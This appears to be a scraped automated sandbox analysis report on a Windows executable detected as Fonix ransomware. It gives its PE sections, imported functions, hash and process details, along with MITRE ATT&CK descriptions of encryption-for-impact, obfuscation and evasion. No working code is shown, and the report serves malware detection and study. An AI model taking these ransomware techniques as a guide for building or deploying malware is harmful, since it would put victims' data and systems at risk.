.text	0x1000	0xcbaa4	0xcbc00	False	0.472607122316	data	6.42152157563	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xcd000	0x53ac0	0x53c00	False	0.402766441231	data	5.43978969466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x121000	0xbd4c	0x8a00	False	0.188632246377	data	4.8717114038	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0x12d000	0x9dd4	0x9e00	False	0.48457278481	data	5.99554424225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x137000	0x94	0x200	False	0.20703125	data	1.43109942357	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x138000	0x1e0	0x200	False	0.529296875	data	4.71229819329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x139000	0x2ba0	0x2c00	False	0.00301846590909	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x138060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.DLL	SetThreadPriority, CreateMutexW, InitializeCriticalSectionEx, FindClose, LocalAlloc, ReleaseMutex, GetLocaleInfoA, OpenProcess, SetFileAttributesW, CreateToolhelp32Snapshot, Sleep, FormatMessageW, CopyFileA, GetLastError, Process32NextW, DeleteFileA, Process32FirstW, CloseHandle, RaiseException, DecodePointer, GetDriveTypeA, LocalFree, DeleteCriticalSection, CopyFileW, WideCharToMultiByte, GetConsoleWindow, GetDiskFreeSpaceExA, OpenMutexW, GetDriveTypeW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetCurrentThread, GetThreadTimes, SetEndOfFile, WriteConsoleW, CreateFileW, SetStdHandle, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, TerminateProcess, GetCurrentProcess, FindNextFileW, SetPriorityClass, FindFirstFileW, SetThreadPriorityBoost, SetProcessPriorityBoost, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, HeapSize, HeapReAlloc, ReadConsoleW, ReadFile, GetFileAttributesExW, CreateProcessW, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, GetCurrentThreadId, WaitForSingleObjectEx, SwitchToThread, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, CreateTimerQueue, SignalObjectAndWait, CreateThread, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, GetModuleFileNameW, GetModuleHandleA, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, LoadLibraryW, WaitForSingleObject, RtlUnwindEx, RtlPcToFileHeader, ExitProcess, GetModuleHandleExW, ExitThread, MoveFileExW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, HeapFree, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, RtlUnwind
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameA
IPHLPAPI.DLL	GetIpNetTable
NETAPI32.dll	NetShareEnum, NetApiBufferFree
USER32.dll	GetKeyboardLayoutList, ExitWindowsEx, ShowWindow, MessageBoxW, SystemParametersInfoW
WININET.dll	InternetCheckConnectionA
WS2_32.dll	inet_ntoa, connect, WSAGetLastError, socket, send, WSAStartup, gethostbyname, closesocket, WSACleanup, recv, htons

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

System Behavior

Analysis Process: fM498uO16Z.exe PID: 1068 Parent PID: 5768

General

Start time:	18:00:05
Start date:	11/01/2021
Path:	C:\Users\user\Desktop\fM498uO16Z.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\fM498uO16Z.exe'
Imagebase:	0x1180000
File size:	1266688 bytes
MD5 hash:	E7F086119362368528A160BE01F194AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Fonix, Description: Yara detected Fonix ransomware, Source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Fonix, Description: Yara detected Fonix ransomware, Source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report fM498uO16Z

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Code Manipulations

Statistics

System Behavior

Analysis Process: fM498uO16Z.exe PID: 1068 Parent PID: 5768

General

Disassembly

Code Analysis